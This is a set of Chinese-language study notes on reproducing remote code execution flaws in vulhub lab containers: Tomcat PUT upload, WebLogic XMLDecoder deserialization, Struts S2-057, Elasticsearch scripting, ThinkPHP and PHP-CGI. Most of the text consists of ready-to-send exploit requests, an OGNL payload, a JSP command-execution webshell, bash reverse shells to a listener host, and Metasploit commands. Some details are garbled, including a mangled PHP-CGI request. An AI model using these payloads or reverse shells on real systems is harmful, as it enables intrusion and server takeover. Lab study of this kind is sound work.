目录
开胃 bash linux反弹shell
1 在攻击机器上 nc -lvp 4444
2 在服务器上 bash -i >&/dev/tcp/192.168.46.129/4444 0>&1
这些rce漏洞重点是记住他们的payload
一 tomcat put上传导致代码执行
1 漏洞编号
CVE-2017-12615
2 路径
cd /home/vulhub/vulhub-master/tomcat/CVE-2017-12615
sudo docker-compose build
sudo docker-compose up -d
3 访问ip
4 burp抓包
PUT /1.jsp/ HTTP/1.1
Host: 192.168.46.129:8080
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
shell
shell可以写入任意内容,也可以是一句话木马
回复201才是正确,把1.jsp写入了
HTTP/1.1 201
Content-Length: 0
Date: Sat, 21 Nov 2020 08:11:55 GMT
Connection: close
5 继续访问
http://192.168.46.129:8080/1.jsp?cmd=id
二 进一步利用
1 写入弹出计算器的程序
PUT /3.jsp/ HTTP/1.1
Host: 192.168.46.129:8080
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
<% Runtime.getRuntime().exec(request.getParameter(‘cmd’)); %>
结果不是很成功
2 bash反弹shell,也是一个思路,把payload做成反弹
bash -i>&/dev/tcp/192.168.46.130/4444 0>&1
3 一句话木马,连菜刀
成功解析jsp
这是php马,需要写专门的jsp马
<%
out.print(“Hello World!”);
%>
访问
http://192.168.46.129:8080/10.jsp
二 weblogic导致的反序列化
漏洞原理
Weblogic的 WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。
思路1 bash反弹shell
2 写入jsp马
1 版本编号
CVE-2017-10271
2 漏洞路径
/weblogic/CVE-2017-10271
3开始访问 403报错
http://192.168.46.129:7001
发送如下的数据包
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.46.129:7001
Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 633
<soapenv:Envelope xmlns:soapenv=“http://schemas.xmlsoap.org/soap/envelope/”> soapenv:Header
<work:WorkContext xmlns:work=“http://bea.com/2004/06/soap/workarea/”>
/bin/bash
-c
bash -i >& /dev/tcp/192.168.46.130/4444 0>&1
</work:WorkContext>
</soapenv:Header>
soapenv:Body/
</soapenv:Envelope>
同时在kali,nc开启监听,得到一个shell
nc -lvnp 4444
l 监听 v 详细信息 n 端口
查看当前目录
二 weblogic的进一步利用
写入webshell
包
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.46.129:7001
Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 638
<soapenv:Envelope xmlns:soapenv=“http://schemas.xmlsoap.org/soap/envelope/”>
soapenv:Header
<work:WorkContext xmlns:work=“http://bea.com/2004/06/soap/workarea/”>
servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp
<![CDATA[ <% out.print("hello world"); %> ]]>
</work:WorkContext>
</soapenv:Header>
soapenv:Body/
</soapenv:Envelope>
浏览器访问,成功
192.168.46.129:7001/bea_wls_internal/test.jsp
三 rce代码执行漏洞
1 struts s2-057
远程代码执行, cve-2018-11776
2 访问 http://192.168.46.129:8080/showcase/
3 233233这个地方代码做运算了,是一个可以考虑插入的点
http://192.168.46.129:8080/struts2-showcase/$%7B233233%7D/actionChain1.action
4 通过burp抓包,修改部分内容,并作url加密,抓那个233*233的包,发布到重发器,通过url解密, decode解密
5 payload,exec不行使用system
${
(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request[‘struts.valueStack’].context).(#cr=#ct[‘com.opensymphony.xwork2.ActionContext.container’]).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec(‘id’)).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}
CVE-2014-3120
2 elastic search 远程代码执行漏洞
一 实验原理
1 分布搜索,分析引擎
二 具体步骤
1 打开靶机目录
cd /home/vulhub/vulhub-master/elasticsearch/CVE-2014-3120
sudo docker-compose build
sudo docker-compose up -d
2 访问端口9200,利用burp抓一条数据,然后传一个包
先写入一条数据,201成功
payload
POST /website/blog/ HTTP/1.1
Host: 192.168.46.129:9200
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
{
“name”: “phithon”
}
3 再传一个带命令执行的数据包,成功拿到id
POST /_search?pretty HTTP/1.1
Host: 192.168.46.129:9200
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 343
{
“size”: 1,
“query”: {
“filtered”: {
“query”: {
“match_all”: {
}
}
}
},
“script_fields”: {
“command”: {
“script”: “import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(“pwd”).getInputStream()).useDelimiter(”\\A").next();"
}
}
}
结果
显示当前目录
二 实验拓展
利用msf中关于elasticsearch的工具,拿下meter
1 先搜索趁手的工具
search ElasticSearch
2 端口必须是9200
不用设置payload
use exploit/multi/elasticsearch/script_mvel_rce
show options
set rhosts 192.168.46.129
set rport 9200
3 run,成功拿下
写入tmp目录,类似windows的system,就是最低的权限都可以在里面写权限
临时后门暂时写进去
4 做一些后渗透
ifoncfig
getuid
3 thinkphp框架漏洞
(1)2.x漏洞,不明白深层的原因
输入payload
http://192.168.46.129:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D
真实形式
http://192.168.46.129:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D
(2)5.0.20漏洞
漏洞具体原因复杂
payload
\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
http://192.168.46.129:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
http://192.168.46.129:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ipconfig
(3)php cgi 远程代码执行漏洞
CVE-2012-1823
http://192.168.46.129:8080/index.php?-s 爆出源码
payload
POST /index.php?-d+allow_url_include%3don±d+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: example.com
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
结果
<?php eval(phpinfo()); ?>显示phpinfo